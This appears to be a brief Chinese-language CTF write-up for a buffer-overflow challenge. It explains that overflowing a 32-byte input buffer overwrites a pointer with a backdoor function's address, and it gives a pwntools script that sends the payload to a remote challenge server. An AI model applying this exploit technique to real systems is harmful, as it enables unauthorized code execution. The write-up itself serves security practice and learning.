check一下,只开了NX。
拖进ida
我们输入v2,v2大小为32,输入v2后就将指针v3覆盖为后门函数地址。
脚本:
#! /usr/bin/env python
from pwn import *
p=remote('111.198.29.45',58843)
print p.recvuntil("> ")
p.sendline('A')
payload='A'*32+p32(0x080486cc)
print p.recvuntil("> ")
p.sendline(payload)
print p.recvall()